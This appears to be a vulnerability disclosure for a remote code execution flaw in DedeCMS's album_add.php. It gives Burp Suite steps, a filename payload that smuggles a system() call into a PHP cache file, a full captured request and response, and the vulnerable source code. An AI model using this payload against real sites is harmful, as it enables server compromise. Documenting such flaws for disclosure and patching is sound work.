- Log in to the management page first, then select "内容维护" in the upper right corner, then click "图片集" on the left, and finally click "添加文档" in the middle. As shown below:
- After entering "添加文档", fill in the "图集标题" in turn, select "图集主栏目", and select local images in the manual upload section to upload a picture.
- Then open burpsuit and turn Intercept on, intercept the HTTP request that clicks the "确定" button, then modify the value of the "name" parameter at the location shown in the icon to
');system('ipconfig');//
- Finally, Forward the HTTP request, and then you can see that the
ipconfigcommand is successfully executed
HTTP Request:
POST /dede/album_add.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 4121
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://dedecms-57105.localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoNBMhAWA73UNeUq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=693db57bf5d85c42; PHPSESSID=0kckthapkrjb7jlhg207ovnit2; _csrf_name_8fc2d915=ee428983820312df1afe447e487e3dbd; _csrf_name_8fc2d9151BH21ANI1AGD297L1FF21LN02BGE1DNG=e2a21dd6e71d551c; DedeLoginTime=1694173153; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=1971781375dd7f27; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="channelid"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="cid"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imagebody"
粘贴到这里...
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="maxwidth"
800
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="albumUploadFiles"
[{"name":"');system('ipconfig');//","remark":"something"}]
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="title"
rce
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="shorttitle"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="redirecturl"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="tags"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="weight"
108
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="picname"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid"
13
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid2"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dede_addonfields"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagestyle"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="row"
3
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="col"
4
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ddmaxwidth"
200
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagepicnum"
12
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="isrm"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="zipfile"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="delzip"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="copysource"
http://
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="body"
<p>123123</p>
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="source"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="writer"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="notpost"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="click"
199
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="sortup"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="color"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="arcrank"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ishtml"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pubdate"
2023-09-08 19:55:03
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="money"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="description"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="filename"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.x"
44
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.y"
17
------WebKitFormBoundaryfoNBMhAWA73UNeUq--
HTTP Response:
HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 08 Sep 2023 12:02:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.6.9
Content-Length: 4344
Windows IP ����
δ֪������ Appgate SDP:
�����ض��� DNS �� . . . . . . . :
IPv4 ��ַ . . . . . . . . . . . . : 192.168.9.86
�������� . . . . . . . . . . . . : 255.255.255.255
Ĭ������. . . . . . . . . . . . . :
��̫�������� ��̫�� 2:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
��̫�������� VirtualBox Host-Only Network:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::3e32:8785:dc70:871f%22
IPv4 ��ַ . . . . . . . . . . . . : 192.168.56.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
δ֪������ OpenVPN TAP-Windows6:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 1:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 10:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
��̫�������� VMware Network Adapter VMnet1:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::49f3:576f:5115:6188%8
IPv4 ��ַ . . . . . . . . . . . . : 192.168.65.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��̫�������� VMware Network Adapter VMnet8:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::3812:ae41:6c56:c806%11
IPv4 ��ַ . . . . . . . . . . . . : 192.168.40.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��̫�������� ������������:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>成功发布一个图集!</title>
<link rel="stylesheet" type="text/css" href="/plus/img/base.css">
</head>
<body background='/plus/img/allbg.gif' leftmargin="8" topmargin='8'>
<table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#DFF9AA">
<tr>
<td height="28" style="border:1px solid #DADADA" background='/plus/img/wbg.gif'>
<b>◇文章管理::发布图集</b>
</td>
</tr>
<tr>
<td width="100%" height="80" style="padding-top:5px" bgcolor='#ffffff'>
<table width='100%' border='0' cellpadding='3' cellspacing='1' bgcolor='#DADADA'>
<tr bgcolor='#DADADA'>
<td colspan='2' background='/plus/img/wbg.gif' height='26'><font color='#666600'><b>成功发布一个图集:</b></font></td>
</tr>
<tr bgcolor='#FFFFFF'>
<td colspan='2' height='100'> <div style="line-height:36px;height:36px">
请选择你的后续操作:
<a href='album_add.php?cid=13'><u>继续发布图片</u></a>
<a href='archives_do.php?aid=121&dopost=editArchives'><u>更改图集</u></a>
<a href='/a/tuji/2023/0908/121.html' target='_blank'><u>预览文档</u></a>
<a href='catalog_do.php?cid=13&dopost=listArchives'><u>已发布图片管理</u></a>
<a href='/dede/content_i_list.php?channelid=2'>[<u>记忆的列表页</u>]</a>
</div><table width='80%' style='border:1px dashed #cdcdcd;margin-left:20px;margin-bottom:15px' id='tgtable' align='left'><tr><td bgcolor='#EBF5C9'> <strong>正在进行相关内容更新,请完成前不要进行其它操作:</strong>
</td></tr>
<tr><td>
<iframe name='stafrm' frameborder='0' id='stafrm' width='100%' height='200px' src='task_do.php?typeid=13&aid=121&dopost=makeprenext&nextdo='></iframe>
</td></tr>
</table> </td>
</tr>
<tr><td bgcolor='#F5F5F5'> </td></tr></table>
</td>
</tr>
</table>
<p align="center">
<br>
<br>
</p>
</body>
</html>
The vulnerable code appears in dede/album_add.php, and the key code snippets are as follows.
<?php
...
if ($albumUploadFiles !== '') {
$files = json_decode(stripslashes($albumUploadFiles), true);
foreach ($files as $file) {
$uploadTmp = DEDEDATA . '/uploadtmp';
$tmpFile = $uploadTmp . '/' . $file['name'];
$fileDir = $cfg_image_dir . '/' . MyDate($cfg_addon_savetype, time());
CreateDir($fileDir);
$filePath = $fileDir . '/' . $file['name'];
...
$fid = $dsql->GetLastID();
AddMyAddon($fid, $filePath);
...
Follow up AddMyAddon function:
<?php
...
function AddMyAddon($fid, $filename)
{
$cacheFile = DEDEDATA.'/cache/addon-'.session_id().'.inc';
if(!file_exists($cacheFile))
{
$fp = fopen($cacheFile, 'w');
fwrite($fp, '<'.'?php'."\r\n");
fwrite($fp, "\$myaddons = array();\r\n");
fwrite($fp, "\$maNum = 0;\r\n");
fclose($fp);
}
include($cacheFile);
$fp = fopen($cacheFile, 'a');
$arrPos = $maNum;
$maNum++;
fwrite($fp, "\$myaddons[\$maNum] = array('$fid', '$filename');\r\n");
fwrite($fp, "\$maNum = $maNum;\r\n");
fclose($fp);
}
...
When the albumUploadFiles function is called, the file name will be passed as a parameter into the AddMyAddon function, and then the carefully constructed malicious code in the file name will be written to the cacheFile file and then triggered by the include() function. This results in an arbitrary remote code execution vulnerability.



